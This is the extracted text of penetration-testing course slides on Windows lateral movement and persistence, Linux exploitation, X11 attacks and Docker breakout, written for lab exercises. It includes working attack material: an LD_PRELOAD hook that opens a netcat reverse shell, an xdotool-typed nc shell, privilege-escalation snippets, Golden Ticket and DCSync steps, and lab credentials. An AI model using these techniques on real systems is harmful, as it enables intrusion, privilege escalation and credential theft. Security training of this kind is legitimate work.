– Local privilege escalation exploit fails

• The fix:
– Migrate to a 64bit process ‘migrate <pid>’
– Use a suitable payload i.e windows/x64/meterpreter/reverse_tcp
– Use a secondary metasploit exploit:
use windows/local/payload_inject
set payload windows/x64/meterpreter/reverse_tcp

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Pivoting and Lateral Movement
• Leverage a compromised host to gain access to internal resources

• If we have a Meterpreter shell we can utilize its routing capabilities

route add 10.0.0.0 255.255.252.0 $SESSIONID
route print

Active Routing Table

====================

Subnet Netmask Gateway

------ ------- -------
10.0.0.0 255.255.252.0 $SessionID

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Pivoting and Lateral Movement

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Pivoting and Lateral Movement
• Running MSF modules over the pivot - it just works!

• But what about programs that are external to MSF?

• This is where a SOCKS proxy and Proxychains come in!

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Pivoting and Lateral Movement
• Setup the SOCKS Proxy in MSF:
msf auxiliary(smb_version) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > set SRVPORT 1080

• Configure Proxychains to use the SOCKS Proxy server & port (/etc/proxychains.conf)

• Precede any command with ‘proxychains’ and traffic will be routed appropriately
proxychains nmap -Pn -sT 10.0.2.220 -p445 -nvvv
|S-chain|-<>-127.0.0.1:1080-<><>-10.0.2.220:445-<><>-OK
PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Knowing Your Environment: Services
• Useful services for lateral movement within a network:

– WMI (TCP 135 > random port then selected for further comms)
– SMB (TCP 139 / 445)
– RDP (TCP 3389)
– WinRM / PowerShell Remoting (TCP 5985 for HTTP & 5986 for HTTPS)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Knowing Your Environment: WinRM
• WinRM authentication mechanisms: https://msdn.microsoft.com/en-us/library/aa384295(v=vs.85).aspx
– Basic
– Digest
– Negotiate
– Kerberos (default in a domain environment / must use hostname not IP)
– Client Certificate

• Verify if the WinRM service is running on a remote system

Test-WSMan $hostname.plum.local

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Knowing Your Environment: WinRM
• Making a connection: Invoke-Command -scriptblock { whoami } -computer
$target.plum.local

• In some circumstances we may be forced to use a HTTPS session - remember, by

default this is over TCP 5986
– Force SSL: -UseSSL
– Force the port: -port 5986

• If SSL is in place it is likely that the target has been issued a self-signed certificate:
– Skip CA checks (defined as a option): New-PSSessionOption -SkipCACheck
-SkipRevocationCheck

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Knowing Your Environment: WMI
“...The Windows Management Instrumentation Command-line (WMIC) is a
command-line and scripting interface that simplifies the use of Windows
Management Instrumentation (WMI) and systems managed through WMI.
WMIC is based on aliases…’

[source] https://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/wmic.mspx?mfr=true

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Knowing Your Environment: WMI
• A simple command may resemble:
wmic useraccount get name,sid

• Using the /node switch it’s also possible to run queries against remote hosts
(assuming permissions allow):

wmic /node:192.168.X.X /user:'plum\administrator' /password:'XXXXXXX'

useraccount get name,sid

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Knowing Your Environment: WMI
• WMIC process call create can be used to run commands on a host

Popping calc.exe because we’re 1337!

wmic /node:192.168.X.X process call create "calc.exe”

Or maybe running a command on the host would be more beneficial...

wmic /node:192.168.X.X /user:'plum\administrator' /password:'XXXXXXX'
process call create “cmd.exe /c $DoSomethingEvil”

• Back in the Post Exploitation module we looked at some WMI capable tools

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 5.7 (Part 1)
• Use Kali to gain a Meterpreter session on the Windows 10 host 192.168.X.17

• Use this session to identify a host on the 10.0.2.0/24 network (hint it’s not .215)

• Find the hostname and operating system version of the identified host

• Using nmap, determine which ports are open on the host

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 5.7 (Part 2)
• Return to the RDP session on your Windows 10 host and target a service that allows remote
connectivity and gain privileged shell access on the host within the 10.0.2.0/24 network
• Extract clear text passwords from the host

* NOTE: In exercise 5.6 (part 2) you extracted a certificate from “\\DC01\ITSupport$\Server

Management” that will be used within this exercise. You will need to import this into the
Windows 10 host (192.168.X.17) as a user certificate

In preparation of this, the following registry additions have been made to the target host:
HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ LocalAccountTokenFilterPolicy < set to 1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ UseLogonCredential
< set to 1

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

WinRM: FAILSAFE
If, for any reason, you have not managed to gain access to the host 10.0.2.220 via
WinRM/PowerShell Remoting, the following failsafe has been put into place. This
account can be used to complete flag 2 in exercise 5.7 “Extract clear text passwords
from the host”

• Username: .\backup_account
• Password: Password12345!

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Exploitation Status
● Domain controller for plum.local
● Through enumeration we found plum\bob ● Host is a member of plum.local
is a valid account ● Gained RDP access via:
● Deduce that plum\ITSupport has delegation ○ plum\bob (Summer18)
rights over the Regions OU ● Overcame AppLocker restrictions and
● Used plum\kevin to add a new user to the can run PowerShell scripts
plum\server_management group and gain ● Escalated privs and added local admin
access to the “Server Management” via weak service binary permissions
directory under ITSupport$ ○ john (Password123!)
● Gained access to:
○ plum\kevin NTLM hash (via
active sessions)
● Discovered new host certsrv (10.0.2.220) ○ plum\backupsvc
● Extracted credentials from active sessions: (%Qu1t3S3cUre3P@sS$) via
○ plum\godmode (1@mth30n3) LSASecrets
● Found a 2nd interface on the network
10.0.0.0/22

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Post Exploitation & Persistence Techniques

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Persistance: LOLBins
• Living Off The Land Binaries | *https://github.com/api0cradle/LOLBAS
• Useful for policy bypasses/persistence
• *Can be used to perform other actions than what the binary was intended to do:
– Execute code
– Download/upload files
– Bypass UAC
– Compile code
– Get creds/dumping process
– Surveillance (keylogger, network trace)
– Evade logging/remove log entry
– Side-loading/hijacking of DLL
– Pass-through execution of other programs or scripts
– Persistence (Hide data in ADS, execute at logon etc)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Post Exploitation: DCSync
• Mimikatz DCSync can be used to impersonate a Domain Controller
• Code is not run on the DC
• Successful exploitation allows access to user password history
• We need privileges to be able to do this:
– Domain Admin
– Enterprise Admin
– Domain Controller
– OR an account with the following two permissions set (set via ADSI Edit):

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Post Exploitation: DCSync
• Example: plum\alice has these two permissions - now revoked before you get ideas ;-)

• A nice article on prevention/lockdown

http://www.cyber-security-blog.com/2016/08/how-to-lockdown-active-Directory-to-thwart-use-of-mimikatz-dcsync.html

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Persistence: Kerberos (simplified)
Normal Kerberos Authentication

1. AS_REQ: User authenticates with KDC

2. AS_REP: If auth is successful the KDC issues a TGT
a. TGT includes account name, role info, group
membership details (PAC)
b. Only the krbtgt account can read this
3. TGS_REQ: The TGT is used to request a service ticket
a. TGT from stage 2 (KDC verifies PAC and checksum)
4. TGS_REP: PAC copied to new service ticket. New TGS
ticket returned to client
5. AP_REQ: TGS ticket is used to authenticate to xyz server

[Image source] https://redmondmag.com/articles/2012/02/01/understanding-the-essentials-of-the-kerberos-protocol.aspx

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Persistence: Golden Ticket
Golden Tickets: Overview
• The Kerberos TGT is encrypted and signed by the KRBTGT account
• The lifetime of tickets is defined within Kerberos policies; by default this stands at 10 hours

The Attack:
If we have access to any of the following we can create, encrypt and sign our own tickets!
KRBTGT NTLM Hash
AES128 HMAC Encryption Key
AES256 HMAC Encryption Key
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Persistence: Golden Ticket
Normal Kerberos Authentication Kerberos and Golden Tickets

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Persistence: Golden Ticket
• Requirements:
– FQDN of the target domain
– The domain SID
– NTLM hash of the KRBTGT account

• The target account doesn’t even have to be a legitimate user!

• Due to the trust the KDC has with TGT, we can create a ticket with a custom lifetime that
exceeds the aforementioned policies - up to a maximum of 10 years!

• Golden tickets can be created using the KRBTGT hash until the password for the account is
changed twice

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Persistence: AdminSDHolder and SDProp
Remember seeing this container in the Active Delegation Slides?
• SDProp runs every 60 mins (by default)
• ‘Clones’ the ACL of AdminSDHolder to protected objects (AdminCount=1)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Persistence: AdminSDHolder and SDProp

[Further info] https://adsecurity.org/?p=1906

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Persistence: DCShadow
• Create and register a rogue Domain Controller
• Inject malicious objects into the environment
• Presented at BlueHat 2018 - http://www.bluehatil.com/files/Active Directory What Can Make
Your Million Dollar SIEM Go Blind.pdf

*[source] dcshadow.com - as of June 2018

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
 LAB Time Challenges (5.8 & 5.9)
Exercise 5.8:
• Using the privileged account ‘godmode’, gain a Meterpreter shell on the Domain
Controller (192.168.3.215) without using SMB

Exercise 5.9:
• Create a Golden Ticket on the plum.local domain
• Impersonate a Domain Controller and gain access to domain password hashes
• Find the clear text password for the user account jenny

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Exploitation Status
● Domain controller for plum.local
● Through enumeration we found plum\bob is a valid
account ● Host is a member of plum.local
● Deduce that plum\ITSupport has delegation rights ● Gained RDP access via:
over the Regions OU ○ plum\bob (Summer18)
● Used plum\kevin to add a new user to the ● Overcame AppLocker restrictions and can
plum\server_management group and gain access to run PowerShell scripts
the “Server Management” directory under ● Escalated privs and added local admin via
ITSupport$ weak service binary permissions
● Gained shell on host using plum\godmode and ○ john (Password123!)
WMIC process call create ● Gained access to:
● Created a golden ticket with 10 year lifespan ○ plum\kevin NTLM hash (via active
● Gained access to clear text password for sessions)
plum\jenny via DCSync as this account uses ○ plum\backupsvc
reversible encryption (%Qu1t3S3cUre3P@sS$) via
LSASecrets
● Discovered new host certsrv (10.0.2.220) ● Found a 2nd interface on the network
● Extracted credentials from active sessions: 10.0.0.0/22
○ plum\godmode (1@mth30n3)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Network Status: After Windows Exploitation

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Module 6
Hacking *nix

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 The Basics
• Everything is a file
• The root user (id=0) has access to all files
• Home Folder (~) locations are identified at paths such as /home/<username> and
/root for root user
• Configuration files
– /etc: system wide configuration (except creds generally readable)
– /home/<username>/: user specific configuration (reachable by user and root)
• Passwords
– /etc/passwd: contains user details
– /etc/shadow: contains salted password hashes

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Linux Enumeration and Exploitation

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Finger
• Listens on TCP port 79
• The Finger program provides status reports on a particular computer system
or a particular person
• The program can supply information such as whether a user is currently
logged-on, e-mail address, full name etc.
• As well as standard user information, finger displays the contents of the
.project and .plan files in the user's home directory
– This could, at times, reveal “juicy” information

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 6.1
• What services are listening on host 192.168.X.209?

• Identify users present on the system using the finger service

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

SSH
• Remote administration service
• Provides ‘secure’ equivalent of Telnet and offers data encryption
• Common types of SSH authentication mechanisms:
– Password based authentication is the most widely deployed and targeted in
hacking world!
– Key/hosts based, GSSAPI, Others.
• SSH versions:
– v1 (deprecated now - inherent weaknesses such as insecure integrity
checksums, MiTM attack susceptibility)
– v2 (the latest version in use. If the server strings show v1.99, this means both
versions are supported)
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
SSH Key Authentication
• Create a public/private key pair

• Upload public key to remote servers /home/user/.ssh/authorized_keys

– NOTE: authorized_keys file should not be world writable

• Authenticate with your private key

– NOTE: private key should only be readable by the user

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

NFS
• Network File System (NFS) allows folders to be shared across the
network
• Share permissions are vital to the security of the NFS host
• Configuration file: /etc/exports
• To view a remote NFS share: showmount –e <IP>
• To mount a share:
mount –o nolock 192.168.X.209:/nfs_share_name /mnt/nfs

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

NFS: Permissions
• Once the NFS share is mounted you can read/write files (if NFS
permissions allow so)
– Which user can read/write files will depend on the uid/gid of the folder/file
– As you have root access on your system (Kali); you can create a user locally with
a matching uid/gid and then read/write files on the remote share that is mapped
locally on your Kali host!

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 6.2
• On what port is NFS listening on the host 192.168.X.209?

• What is the share exported by the NFS Server?

• Identify a vulnerability related to the exported NFS directories which

we may be able to ‘abuse’ and then login to the remote host using SSH

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

SSH/NFS: FAILSAFE
If, for any reason, you have not managed to gain SSH access as foo2, the following
failsafe has been put into place

• Username: foo2
• Password: 2in1@foo2

IMPORTANT: Within the following challenges you will be required to substitute the
SSH key for this password

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Restricted Shells
• Shell access can be further restricted by use of restricted shells
– Pre-packaged restricted shells such as rbash
– Homegrown or written from scratch in perl / python (lshell)

• Each has its own strengths and weaknesses

– rbash: disallows / in commands, but at the same time if path contains the
command it doesn’t stop it from executing
– lshell: performs command parsing and hence vulnerable to logic bugs

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 Restricted Shell: Escape Examples
• VIM
– !sh : will escape to shell
• Nmap
– (<4.2 version) Nmap --interactive can allow you to gain elevated privilege if Nmap is
allowed to run as root
– Assuming nmap can be run as a privileged user; we could create a nse script that can
then be invoked to achieve code execution under the context of this privileged
account
• Tcpdump
echo "id" > /tmp/test3; chmod +x /tmp/test3; sudo tcpdump -ln -i eth0 -w
/dev/null -W 1 -G 1 -z /tmp/test3 -Z root

More Fun : http://0x90909090.blogspot.in/2015/07/no-one-expect-command-execution.html

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
 SUID Files
• Executes with uid of the owner of the file(s) and not with the permission of user
executing it

• Creating a SUID & SGID file

– chmod 6755 file_name
– Interpreted code starting with #! even if SUID bit is set, will not be executed
with inherited privilege (i.e. scripts will be ignored)
– Bash by default drops privileges to calling user, use -p to retain permissions

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

euid to uid

• euid (effective user id)?

• euid = 0 = root = game over!
• While euid is good, we really want to have uid as the victim
user

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

euid to uid: Example

• sudo –l lists the allowed commands for the invoking user on the
current host

• The invoking user is derived based on uid, not euid

• Thus it's always worthwhile gaining the same uid as euid

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

euid to uid: Example
• An example of a simple C program to start bash with euid/egid privileges
setreuid(uid_t ruid, uid_t euid);

#include <sys/types.h>
#include <unistd.h>
int main(void){
setreuid(geteuid(),-1);
setregid(getegid(),-1);
char *args[] = {"/bin/bash",0};
execve(args[0],args,0);
return 0;
}

Interesting Read: http://yarchive.net/comp/setuid_mess.html

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Shell Games: Non-Interactive to Interactive
If you obtain a reverse shell via nc or similar methods you might end up
getting a non-interactive shell
• You don’t see the prompt.
• Commands like “clear” or “^L” or “ssh” fail with “must be run from
terminal”

Some options to gain an interactive shell include:

• python -c 'import pty; pty.spawn("/bin/bash")'
• perl -e 'exec "/bin/sh";'
• /bin/sh -i

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 6.3
Identify a security misconfiguration and perform following:
• Execute ifconfig as user foo2 and store the output (by breaking out of
restricted shell as foo2 user)
• Elevate yourself to foo user
• Obtain SSH access as foo user (using the trick applied as part of 6.2)
• Obtain output of /etc/pwn1.txt as user foo using the SSH shell

Bonus:
• Identify alternative breakout scenarios

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

SSH: FAILSAFE
If, for any reason, you have not managed to gain SSH access as foo, the following
failsafe has been put into place

• Username: foo
• Password: AIH@foo4321

IMPORTANT: Within the following challenges you will be required to substitute the
SSH key for this password

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

More Breakout / Elevation options: GTFObins
• List of binaries to bypass local security protections
• https://gtfobins.github.io/
• Inspired by LOLBins project on Windows
• Binaries can be used to perform a wide range of actions
– Interactive execute
– Non-interactive reverse shell
– Non-interactive bind shell
– File write
– File read
– Sudo
– Limited SUID
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
NFS: Security
• NFS exports/shares should be kept in a separate disk partition
• Partition should be mounted with “nosuid” and “noexec”
perms via /etc/fstab
– “nosuid” implies SUID files cannot be configured on a NFS share
– “noexec” implies files cannot be executed from the NFS share
Example: <UUID> /ABC auto nosuid,nodev,nofail,x-gvfs-show,noexec 0 0

• NFS Share should have root_squash enabled [default_config]

– “root_squash” prevents remote root users from having root
privileges and assigns them ‘nobody’ permissions (default)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

rservices

● Legacy services:
○ rexec (512/tcp)
○ rlogin (513/tcp)
○ rsh (514/tcp)

● Security problems:
○ Lack of encryption
○ Brute force susceptibility
○ RSH connection spoofing (ADMspoof)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

rservices

● rservices use standard PAM modules, however, access control is

overridden by the following configuration files:
○ /etc/hosts.equiv
○ ~/.rhosts

● Config file format/description/example:

○ /etc/hosts.equiv containing “mypc bob” implies that user Bob is allowed to connect
to this host from the host mypc
○ Similarly, “+ bob” means bob is allowed to connect to this host from any machine
/etc/hosts.equiv (system wide) supersedes the following…
/home/user/.rhosts (user specific)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

LAB Time Challenges 6.4
• Which file manages authentication for rservices such as rlogin/rsh etc?

Using access gained in the previous exercise:

• Examine the contents of the identified file and login to the host
192.168.X.209 using the ‘rlogin’ service

• Which users you can log on as using the rlogin service on the host
192.168.X.209?

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Apache

● The most widely known open source web server

● Main security issues revolve around Apache modules, patching and
configuration
● Allows modules to extend functionality i.e. supporting programming
languages such as PHP, or features like per user html directories and
more

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Apache Modules: userdir

● Multi user system can have the module userdir enabled which
allows every user to run a website via their own home folder
● mod_userdir requires the user to have a directory named as
public_html, i.e. /home/<username>/public_html
● This can be accessed by: http://IP/~<username>/<file_name>

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Server Hardening

● There are multiple areas which should be investigated:

○ File system permissions (write access to webroot)
○ Process execution (running apache as root?)
○ Restricting supported modules / languages (userdir, PHP etc)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

PHP Hardening
● Version <6: use Suhousin (https://suhosin.org)
● Version >6 (7.X)
○ Suhousin is not production ready, nor close to working
○ Limiting options via php.ini (disable_functions, disable_classes)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

PHP Hardening: Bypasses
● Various PHP functions that can be used for code execution:
○ exec
○ system
○ passthru
○ popen
○ shell_exec
○ proc_open
○ dl
○ pcntl_exec (only usable on command line)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

PHP Hardening: Feature Abuse

● putenv function allows php to set environment variables

● mail function performs mail operations in Unix systems by calling
/usr/bin/mail executable (use strace over php to identify flow)
● LD_PRELOAD environment variable allows:
○ Dynamic library loading to override function calls
○ Useful to override specific features and obtain better control
over application
● Compiling shared objects:
gcc --shared -fPIC hook.c -o hook.so

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Feature Abuse: Sample Code
Shared Library Code (hook.c) Invoking PHP Code
#include <stdlib.h> <?php
#include <string.h> putenv("LD_PRELOAD=/home/foo/public_html/hook
#include <sys/types.h> .so");
int geteuid() { mail("a","a","a","a");
if (getenv("LD_PRELOAD") == NULL) { return 0; } ?>
unsetenv("LD_PRELOAD");
system("rm /tmp/1298;mkfifo /tmp/1298;cat
/tmp/1298|/bin/bash -i 2>&1|nc <IP_ADDRESS>
<PORT> >/tmp/1298");
}

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 6.5
• Read the file /home/foo/secret.txt on the host 192.168.X.209
• Obtain a reverse shell via the webserver (id=www-data)

Bonus:
• List at least 2 attack vectors for reading the aforementioned file

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Hacking X11
● X11, when exposed, allows you to remotely connect and perform
operations (capture/send keystrokes, grab screenshots)

● Two basic access control mechanisms:

○ xhost:enables/disables ACLs on the server, +/- are used to enable/disable
access to the host. xhost + means wildcard access is allowed
○ xauth: cookie based access control mechanism

● Get Screenshot:
○ xwd -root -display 192.168.X.209:0 > output.raw

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Hacking X11: Sending Keystrokes
● Focus on specific server (setting environment variables):
export DISPLAY=192.168.X.209:0

● Type keystrokes:
xdotool type “nc 192.168.X.206 5555 –n –e /bin/bash”

● Send special characters:

xdotool key KP_Enter

http://www.semicomplete.com/projects/xdotool/xdotool.xhtml

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Hacking X11: Kill Screensaver Remotely
● If you take a screenshot and it’s a black image, a screensaver is most
likely enabled

xwininfo -root -children -display 192.168.X.209:0

{snip}
0x3200001 “gnome-screensaver”: (“gnome-screensaver”
“Gnome-screensaver”) 10×10+10+10 +10+10

xkill -display 192.168.X.209:0 -id 0x3200001

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 6.6
• On what port is the X11 service running?

• Identify and exploit a flaw in the X11 service by obtaining a screenshot

of the desktop on remote host 192.168.X.209

• Obtain a reverse shell by exploiting this vulnerability

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

SSH Pivoting and Tunnelling
• Port forwarding:
– Dynamic port forwarding
– Local port forwarding
– Reverse Port forwarding

• Port forwarding works even if your shell is marked as nologin or false

• ssh -N to connect, but not request the shell
• ssh -g allows remote hosts to connect to local forwarded ports

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Dynamic Port Forwarding
• ssh -D 8786 username@internal_box (using password)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Local Port Forwarding
• ssh -L <local_port>:Target_Box_IP:<target_port> username@whitelisted_host

Example: ssh -L 8000:192.168.3.210:80 root@192.168.X.206

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Reverse Port Forwarding
• ssh -R <remote_port>:localhost:<local_port> username@internal_box

Example: ssh -R 18888:localhost:8085 username@internal_box

• Run a socks proxy on localhost port 8085

• Run proxychains on ‘Internal Box’

cat /etc/proxychains.conf
socks5 127.0.0.1 18888

• Execute command
proxychains curl https://google.com

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise 6.7
• Read the databases and identify the value of flag from mongoDB

Bonus: Access mongoDB on 192.168.X.209 from your Kali machine / base

(delegate machine) using various tunneling techniques as discussed

Note: Remember mongoDB from database discussion in Module 3

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Linux Privilege Escalation

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Local Privilege Escalation
● Remember: There are multiple ways to get root!
○ Enumerate, collect and analyse information
● Weak file permissions; for example:
○ Accessible sensitive files /etc/shadow, /etc/passwd, .bash_history etc
○ Misconfigured services such as cron jobs, inetd, etc.
○ Writable files/directories
● Weak passwords (via /etc/shadow, sucrack to crack local user accounts)
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Local Privilege Escalation
• Kernel exploits
• Sudo misconfiguration
– sudo –l lists the allowed commands
– Look for potential misconfigurations
• Passwords in files
• Misconfigured services
• Weak permissions/configuration on SUID files, scripts etc.
• Poorly configured cron jobs
• LD_PRELOAD
– Function overriding, as seen in Apache Exercise 6.5
• and many more...
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
LinEnum: Automated Enumeration
• Scripted Local Linux Enumeration & Privilege Escalation Checks
• https://github.com/rebootuser/LinEnum
• Performs large array of checks in an automated manner
• Easier to identify most common attack paths

Alternative: http://pentestmonkey.net/tools/audit/unix-privesc-check

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 6.8
• Identify a file permission misconfiguration that will allow you to
escalate permissions

• Obtain root access by exploiting this flaw

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Getting Root: FAILSAFE
If, for any reason, you have not managed to gain SSH access as foo, the following
failsafe has been put into place

• Username: root
• Password: abc1234 (yup, it was brute-forcible )

IMPORTANT: Within the following challenges you will be required to substitute the
SSH key for this password

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Local Privilege Escalation: Kernel Exploits
• From time to time kernel vulnerabilities are discovered and exploits are
publicly released

• Compile and run; as simple as that!

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Post Exploitation: What Next?
• Remember everything is a file - look inside /etc/
• Networks : /sbin/ifconfig, ip link,
• Look at history or other files in home directory
– find /home -type f -iname ‘.*history’
• Look at ssh keys in /home/<user>/.ssh/
• Look at firewall rules : iptables -L
• Look at open files : lsof -nPi
• Active connections : netstat -nltupw
• Arp : arp -a
• Route: route -n

More: https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Post Exploitation: Credential Extraction
We can further exploit the system to gain access to user credentials such
as /etc/shadow. These are hashed passwords and need to be brute forced.

•mimipy / mimipenguin
–This tool dumps the process memory, uses it to create a wordlist to bruteforce
shadow file
–It can also help extract passwords from memory
–Result: Insanely fast plaintext credential retrieval
•3snake
–https://github.com/blendin/3snake
–Dumps the password from active process memory (SSH)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 6.9
• Obtain the cleartext password for ‘foo’ user

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Module 7
Docker

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Why Docker

• Removes the “It works on my System” syndrome

• Easy & quick to setup environments and test beds

• Loved by start-up's and for PoC development teams

• Loved by Google and likes for scalability and deployment ease

• As secure as you configure it!

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

How Does Docker Work?
• Docker normally runs as a service with elevated privileges (YAY!)
• Docker image is downloaded from a public hub (Docker Hub) or a private
hub
• Image is provided a set of options and executed
• The image may expose ports to other containers or to the external
network
• Docker provides an internal network for all containers on the same host

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Docker: For Pentesters
• From outside it will appear as any other system
• /proc/1/cgroup will show docker references
• pid 1 != init / launchd

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Docker: For Pentesters
• Bash / Python / Perl isn’t usually available
• Containers are disposable hence no Persistence ensured
• Containers can have different resources shared
• Container crash === new spawn anywhere
• Docker Internal Network (172.17.0.0/16)
– https://docs.docker.com/engine/userguide/networking/
• Video: https://youtu.be/V42OQd7p-7Y

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Docker: Running Container Process as Root
• By default host UID == container UID
• Root in container == root on base box
• If a file system is shared, you may have a direct path to get root
• docker run -itv /:/host alpine /bin/sh
– i: interactive
– t: allocate a pseudo TTY
– v: bind mount a volume

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Docker: Exposing Docker Socket/TCP
• Docker socket == access to docker daemon
• Docker could listen on port 2375 (noauth) 2376 (TLS)
– https://docs.docker.com/engine/reference/commandline/dockerd/#examples
• Generally: Dashboard or reporting application containers
• Misconfiguration, (un)intended exposure == compromise
• Video: https://youtu.be/6q7TBbUylbw

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Docker: Unpatched Host /Guest
• Docker shares the kernel with the host
• Kernel bugs could result in host compromise
• Video: https://youtu.be/y7XoIOhWStc

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Docker: Common Commands
Docker System Information
• docker system info
List running containers
• docker ps
Run a container
• docker run -it <image_name> <binary_path>
Enumerate various details
• docker [container|service|stack|plugin] ls
Enumerate images
• docker images

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise 7: Docker Breakout
• Identify ways to run Docker containers on 192.168.X.209 using the
limited user accounts “foo” or “foo2”
• Identify containers and images available on the system
• Obtain root ssh access to 192.168.X.209 using docker and read
/etc/pwn.txt on the host

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Docker: Secure Configuration
• Docker security relies on secure configuration at all levels
– Scrutinize “docker” group
– Docker Socket: only available to root and docker group users
– Docker daemon: only available to root and docker group users
– Docker containers: run processes via limited users
– Docker host and guest: keep up-to-date

• Scan Docker configuration files

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Docker: Configuration Review
• Docker Security Scanning via DockerHub :
https://docs.docker.com/docker-cloud/builds/image-scan/
• Clair : https://github.com/coreos/clair
• Atomic Scan:
https://developers.redhat.com/blog/2016/05/02/introducing-atomic-scan-container-v
ulnerability-detection/
• https://anchore.com/
• Dockerscan : https://github.com/cr0hn/dockerscan
• Dockscan: https://github.com/kost/dockscan
